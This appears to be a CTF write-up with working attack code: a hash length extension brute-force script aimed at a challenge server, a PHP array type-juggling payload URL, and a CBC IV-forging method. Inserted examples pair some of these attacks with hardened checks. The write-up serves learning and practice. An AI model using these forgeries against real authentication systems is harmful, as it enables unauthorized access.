
Junior 0ops WriteUp

Result

rank: 19

score: 1100

Web

1. Penetrate In [Unfinished]

Question

```php
<?php

include 'secret.php';

@$username = $_POST["username"];
@$password = $_POST["password"];

if (isset($_COOKIE["hmac"])) {
    if ($username === "admin" && $password != "admin") {
        if ($_COOKIE["hmac"] === md5("$secret|$username|$password")) {
            die("The flag is " . $flag);
        }
    }
} else {
    setcookie("hmac", md5("$secret|admin|admin"), time() + (60 * 60 * 24 * 7));
    show_source(__FILE__);
}
```
Answer

This problem needs a hash length extension attack to get the flag. But the problem is that I don't have the length of the secret, so I need to enumerate it. Actually, I haven't found it yet.

I find the following tool (hash_extender) and write a script to enumerate the length of the secret. I don't know what the problem is, so I need to read others' writeups.

The script is written in Python.

```python
# -*- coding: utf-8 -*-
# Enumerate the secret length: for each guess, let hash_extender forge a new
# signature and padded password, then try the pair against the server.
import subprocess
from urllib.parse import unquote_to_bytes

import requests

TARGET = "http://202.121.178.201:8081/"
# cookie the server hands out on the first visit: md5("$secret|admin|admin")
ORIG_SIG = "be9fcfa876db5f4184e1635ce6561de7"
HASH_EXTENDER = "../hash_extender/hash_extender"


def gao(password, sig):
    """POST username=admin with the forged password and hmac cookie; return the body."""
    cookie = {"hmac": sig}
    # the form field must be spelled 'password' or the server never sees it
    r = requests.post(TARGET, data={"username": "admin", "password": password},
                      cookies=cookie)
    return r.text


for i in range(10000):
    # --secret is the guessed length of everything in front of "admin", i.e.
    # "$secret|admin|", so the right i is len($secret) + 7
    cmd = [HASH_EXTENDER, "--data", "admin", "--signature", ORIG_SIG,
           "--format", "md5", "-a", "sb", "--out-data-format=html",
           "--secret", str(i), "--quiet"]
    # in --quiet mode the new signature (32 hex chars) and the new data are
    # printed together on one line
    out = subprocess.run(cmd, capture_output=True, text=True).stdout.strip()
    hash_value = out[:32]
    # the html format is percent-encoded; decode it to raw bytes and keep the
    # order data + padding + "sb", which is exactly what the server must hash
    attack_padding = unquote_to_bytes(out[32:])
    ret = gao(attack_padding, hash_value)
    if "The flag" in ret:
        print(ret)
        break
```
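As an added example (not the write-up's script), here is the length extension the script delegates to hash_extender, done in pure Python against a local copy of the challenge's md5("$secret|$username|$password") check with a constructed $secret, together with the HMAC form of the check that closes the hole. The secret, the appended "sb" and the length range are assumptions; the real secret is unknown.

```python
import hashlib, hmac, math, struct
S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
K = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xffffffff for i in range(64)]
SECRET = b"constructed-secret"   # stand-in for the challenge's unknown $secret

def md5_pad(msg_len):
    """Padding MD5 appends to a message of msg_len bytes."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack("<Q", msg_len * 8)

def md5_compress(state, block):
    """One MD5 compression of a 64-byte block; state is four 32-bit words."""
    a, b, c, d = state
    M = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:   f, g = (b & c) | (~b & d), i
        elif i < 32: f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48: f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:        f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + K[i] + M[g]) & 0xffffffff
        a, d, c, b = d, c, b, (b + ((f << S[i]) | (f >> (32 - S[i])))) & 0xffffffff
    return [(x + y) & 0xffffffff for x, y in zip(state, (a, b, c, d))]

def md5_extend(digest_hex, known_len, append):
    """Given only md5(M) and len(M), return (md5(M + glue + append), glue + append)."""
    state = list(struct.unpack("<4I", bytes.fromhex(digest_hex)))  # resume from the digest
    glue = md5_pad(known_len)                  # padding the original hash already absorbed
    tail = append + md5_pad(known_len + len(glue) + len(append))
    for off in range(0, len(tail), 64):
        state = md5_compress(state, tail[off:off + 64])
    return struct.pack("<4I", *state).hex(), glue + append

def issue_cookie():   # what the challenge sets on first visit: md5("$secret|admin|admin")
    return hashlib.md5(SECRET + b"|admin|admin").hexdigest()

def server_check(username, password, cookie):
    """The challenge's check: md5("$secret|$username|$password") === cookie."""
    return (username == b"admin" and password != b"admin" and
            hashlib.md5(SECRET + b"|" + username + b"|" + password).hexdigest() == cookie)

def forge(cookie, secret_len):   # forge (password, hmac) for a guessed secret length
    sig, suffix = md5_extend(cookie, secret_len + len(b"|admin|admin"), b"sb")
    return b"admin" + suffix, sig

def find_secret_len(cookie, max_len=64):   # the write-up's loop, against the local check
    for n in range(1, max_len + 1):
        if server_check(b"admin", *forge(cookie, n)):
            return n

def hmac_check(username, password, cookie):   # hardened form: HMAC is not extendable
    mac = hmac.new(SECRET, username + b"|" + password, hashlib.md5).hexdigest()
    return hmac.compare_digest(mac, cookie)
```

The forged password is "admin" followed by the MD5 glue padding and "sb", so it satisfies `$password != "admin"` while the cookie still matches; the same pair is rejected by `hmac_check`.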

2. Shatter Sha512

Question

```php
<?php
// can u break sha512 algorithm ?

error_reporting(-1);

include 'flag.php';

if (!isset($_GET['x']) || !isset($_GET['y'])) {
    die(show_source(__FILE__));
}

$x = $_GET['x'];
$y = $_GET['y'];

if ($x != $y) {

    if (hash("sha512", $x) === hash("sha512", $y)) {
        echo $flag;
    }

}
```
Answer

The key is that the PHP function hash("sha512", $x) is what decides whether two different variables are equal. If $x is an array, the function returns false, so hash("sha512", $x) === hash("sha512", $y) holds for two different arrays while $x != $y is still true.

So the payload is http://202.121.178.201:8083?x[]=1&y[]=2.

MISC

1. Mystery Number

I get a string which is 5a6d78685a33746b4d4639354d48566661323477643139694e44557a4e6a52666144526f4e4638324e44593058336b3065545239.

I find that it only has 0-9 and a-e, so I guess it is a hex string. I convert it from hex with a website.

Then I get the string ZmxhZ3tkMF95MHVfa24wd19iNDUzNjRfaDRoNF82NDY0X3k0eTR9, and then I Base64 decode it to get the flag.

2. Easy Traffic Analyze

I get a file named flag.pcap. The pcap format file can be loaded in Wireshark, which consists of an application programming interface (API) for capturing network traffic. But it has lost the pcap header. I find a website which introduces the pcap header, take the example header it offers and add it to the file.

Then I open the file in Wireshark. I use File > Export Objects > HTTP to get three files: upload.php, upload(1).php and test.php. I use binwalk to inspect upload.php and the result is that it is ZIP archive data.

Then I rename upload.php to flag.zip and unzip it. After that, I get flag1.png. I use binwalk -e flag.png to get two files from flag1.png, named 5B and 5B.zlib.

I write a python script to output the content of 5B.zlib and find the flag at the end of the file.

```python
import zlib  # not needed: the raw bytes are printed as they are
data = open('5B.zlib', 'rb').read()
print(data)
```

In the course of finding a method to solve the problem, I found some useful tools, such as binwalk, dd and unzip.

A dd example: dd if=carter.jpg of=carter-1.jpg skip=140147 bs=1
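An added example, not part of the write-up, of the header repair done by hand instead of with a copied example header: it prepends a pcap global header to a capture that begins directly at the packet records and then walks the record headers to check that the result is consistent. The link type (1, Ethernet), the snaplen and the two sample records are assumptions.

```python
import struct

# magic read little-endian from the first 4 bytes -> struct byte-order prefix
PCAP_MAGICS = {0xa1b2c3d4: "<", 0xd4c3b2a1: ">",   # microsecond timestamps
               0xa1b23c4d: "<", 0x4d3cb2a1: ">"}   # nanosecond timestamps

def pcap_magic(data):
    """Byte order ('<' or '>') of the global header, or None if it is missing."""
    if len(data) < 24:
        return None
    return PCAP_MAGICS.get(struct.unpack("<I", data[:4])[0])

def global_header(linktype=1, snaplen=65535):
    """24-byte pcap global header: magic, version 2.4, tz, sigfigs, snaplen, linktype
    (1 = Ethernet, assumed for the challenge capture)."""
    return struct.pack("<IHHiIII", 0xa1b2c3d4, 2, 4, 0, 0, snaplen, linktype)

def repair(data, linktype=1):
    """Prepend a global header to a file that starts straight at the packet records."""
    if pcap_magic(data):
        return data                       # already has one; leave it alone
    return global_header(linktype) + data

def walk_records(data):
    """Parse every record header (ts_sec, ts_usec, incl_len, orig_len) and return the
    captured lengths; a ValueError means the file is not consistent, which is the
    sign that the prepended header (or the byte order) is wrong."""
    order = pcap_magic(data)
    if order is None:
        raise ValueError("no pcap global header")
    sizes, off = [], 24
    while off < len(data):
        if off + 16 > len(data):
            raise ValueError("truncated record header at offset %d" % off)
        _, _, incl_len, orig_len = struct.unpack(order + "IIII", data[off:off + 16])
        if incl_len > orig_len or off + 16 + incl_len > len(data):
            raise ValueError("bad record at offset %d" % off)
        sizes.append(incl_len)
        off += 16 + incl_len
    return sizes

# constructed sample: two tiny records with no global header, like the challenge file
HEADERLESS = (struct.pack("<IIII", 1500000000, 0, 6, 6) + b"\x00" * 6
              + struct.pack("<IIII", 1500000001, 5, 4, 4) + b"\xff" * 4)
```

Run `walk_records(repair(open("flag.pcap", "rb").read()))` on a real headerless file; if it raises, the capture was not Ethernet or the records are not where the header assumes.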

Reverse

1. Babyre

I get a pyc file, which contains the byte code that the Python interpreter compiles the source to. I convert it to a py file with a tool.

Then I read the code and work out the encoding method. I write a decode script to get the flag.

```python
from hashlib import md5

def md5raw(s):
    return bytearray(md5(bytes(s)).digest())

def xor(a, b):
    assert len(a) == len(b)
    return bytearray([i ^ j for i, j in zip(a, b)])

# the 32-byte encoded flag recovered from the decompiled pyc
flag = bytearray(b'\xa5\xc6\xe6\xeca\x0c:ED\xed#\x19\x94LF\x11\x17\xc4.\xeb\xa1\xc2|\xc1<\xa9\\A\xde\xd22\n')

# undo the 16 rounds: swap the halves back, then strip the md5 mask from the first half
for i in range(16):
    flag[:16], flag[16:] = flag[16:], flag[:16]
    flag[:16] = xor(flag[:16], md5raw(flag[16:]))
print(bytes(flag))
```

Crypto

1. AES-Server

I get a server.py which tells me that the server runs an AES CBC decrypt program. I should enter IV and enc to construct a plaintext whose beginning is admin. After learning the theory, I find that if I don't change the variable enc, the secret and the result of the block cipher decryption of enc never change. So I set IV to 0 at first and get a string I call temp. Then I XOR hex(admin) and temp, and I get the IV. Using this IV and enc, I construct a plaintext beginning with admin and get the flag.
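An added example, not the challenge's server.py, of the IV trick run against a local CBC decryption oracle, beside the encrypt-then-MAC check that stops it. The block cipher is a stand-in (md5 of key and block) rather than AES, since the trick only relies on D_k(C1) being constant; the key, ciphertext and issued IV are constructed.

```python
import hashlib, hmac

KEY = b"constructed-key!"   # the server's secret key, 16 bytes, constructed
BLOCK = 16

def block_decrypt(key, block):
    """Stand-in for one AES block decryption D_k(C): any fixed keyed map shows the
    CBC relation, because only D_k(C1) being constant matters. Not AES."""
    return hashlib.md5(key + block).digest()

def cbc_decrypt(key, iv, enc):
    """Textbook CBC decryption: P_i = D_k(C_i) XOR C_{i-1}, with C_0 = IV."""
    out, prev = b"", iv
    for off in range(0, len(enc), BLOCK):
        c = enc[off:off + BLOCK]
        out += bytes(x ^ y for x, y in zip(block_decrypt(key, c), prev))
        prev = c
    return out

def oracle(iv, enc):
    """The server as the write-up describes it: decrypts whatever IV and enc it is given."""
    return cbc_decrypt(KEY, iv, enc)

def forge_iv(enc, wanted):
    """The write-up's trick: with IV = 0 the oracle returns temp = D_k(C1), and the IV
    that makes the first plaintext block start with `wanted` is temp XOR wanted."""
    temp = oracle(bytes(BLOCK), enc)[:BLOCK]
    return bytes(x ^ y for x, y in zip(temp, wanted.ljust(BLOCK, b"\x00")))

def tag(key, iv, enc):
    """Encrypt-then-MAC over IV || ciphertext."""
    return hmac.new(key, iv + enc, hashlib.sha256).digest()

def hardened_oracle(iv, enc, mac):
    """Hardened server: a client-chosen IV no longer verifies, so the trick fails."""
    if not hmac.compare_digest(tag(KEY, iv, enc), mac):
        raise ValueError("bad MAC")
    return cbc_decrypt(KEY, iv, enc)

# constructed two-block ciphertext and the IV and tag it was honestly issued with
ENC = bytes(range(32))
ISSUED_IV = bytes(range(100, 116))
ISSUED_MAC = tag(KEY, ISSUED_IV, ENC)
```

Only the first plaintext block depends on the IV; the second block is the same for the forged and the issued IV, which is why leaving enc unchanged keeps everything else stable.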

This post is licensed under CC BY 4.0 by the author.
